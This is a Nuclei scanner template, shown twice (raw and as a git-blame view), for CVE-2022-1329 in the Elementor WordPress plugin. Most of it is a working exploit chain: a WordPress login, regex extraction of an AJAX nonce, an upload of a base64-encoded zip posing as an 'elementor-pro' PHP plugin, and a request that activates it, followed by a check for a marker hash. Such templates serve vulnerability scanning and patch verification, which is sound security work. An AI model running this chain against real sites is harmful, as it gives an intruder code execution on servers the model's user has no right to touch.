nuclei-templates/http/cves/2022/CVE-2022-1329.yaml

id: CVE-2022-1329

info:
  name: Elementor Website Builder - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.
  reference:
    - https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/
    - https://wordpress.org/plugins/elementor/
    - https://plugins.trac.wordpress.org/changeset/2708766/elementor/trunk/core/app/modules/onboarding/module.php
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1329
  remediation: Fixed in version 3.6.3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-1329
    cwe-id: CWE-434
    cpe: cpe:2.3:a:elementor:elementor_website_builder:*:*:*:*:*:*:*:*
    epss-score: 0.96934
  metadata:
    max-request: 4
    verified: true
  tags: cve,cve2022,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea

        --336b29d7aee0463d8b651303eab505ea
        Content-Disposition: form-data; name="action"

        elementor_upload_and_install_pro
        --336b29d7aee0463d8b651303eab505ea
        Content-Disposition: form-data; name="_nonce"

        {{nonce}}
        --336b29d7aee0463d8b651303eab505ea
        Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.zip"

        {{base64_decode("UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=")}}
        --336b29d7aee0463d8b651303eab505ea--

      - |
        GET /index.php?activate=1 HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_4
        words:
          - '5f9bc5edd71c78284dabe630df8cd71d'
templates added 2023-03-18 22:07:09 +00:00			`id: CVE-2022-1329`

			`info:`
fix lint 2023-03-31 14:34:54 +00:00			`name: Elementor Website Builder - Remote Code Execution`
templates added 2023-03-18 22:07:09 +00:00			`author: theamanrawat`
			`severity: high`
			`description: \|`
Fixups and manual enhancements 2023-03-31 13:21:07 +00:00			`The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.`
templates added 2023-03-18 22:07:09 +00:00			`reference:`
			`- https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/`
			`- https://wordpress.org/plugins/elementor/`
Auto Generated CVE annotations [Mon Mar 20 07:05:15 UTC 2023] :robot: 2023-03-20 07:05:15 +00:00			`- https://plugins.trac.wordpress.org/changeset/2708766/elementor/trunk/core/app/modules/onboarding/module.php`
Fixups and manual enhancements 2023-03-31 13:21:07 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-1329`
Auto Generated CVE annotations [Mon Mar 20 07:05:15 UTC 2023] :robot: 2023-03-20 07:05:15 +00:00			`remediation: Fixed in version 3.6.3`
templates added 2023-03-18 22:07:09 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.8`
			`cve-id: CVE-2022-1329`
			`cwe-id: CWE-434`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`cpe: cpe:2.3:a:elementor:elementor_website_builder::::::::`
			`epss-score: 0.96934`
templates added 2023-03-18 22:07:09 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 4`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
templates added 2023-03-18 22:07:09 +00:00			`tags: cve,cve2022,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
templates added 2023-03-18 22:07:09 +00:00			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In`

			`- \|`
			`GET /wp-admin/ HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea`

			`--336b29d7aee0463d8b651303eab505ea`
			`Content-Disposition: form-data; name="action"`

			`elementor_upload_and_install_pro`
			`--336b29d7aee0463d8b651303eab505ea`
			`Content-Disposition: form-data; name="_nonce"`

			`{{nonce}}`
			`--336b29d7aee0463d8b651303eab505ea`
			`Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.zip"`

			{{base64_decode("UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=")}}
			`--336b29d7aee0463d8b651303eab505ea--`

			`- \|`
			`GET /index.php?activate=1 HTTP/1.1`
			`Host: {{Hostname}}`

			`cookie-reuse: true`
			`extractors:`
			`- type: regex`
			`name: nonce`
			`group: 1`
			`regex:`
			`- 'admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'`
			`internal: true`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_4`
			`words:`
			`- '5f9bc5edd71c78284dabe630df8cd71d'`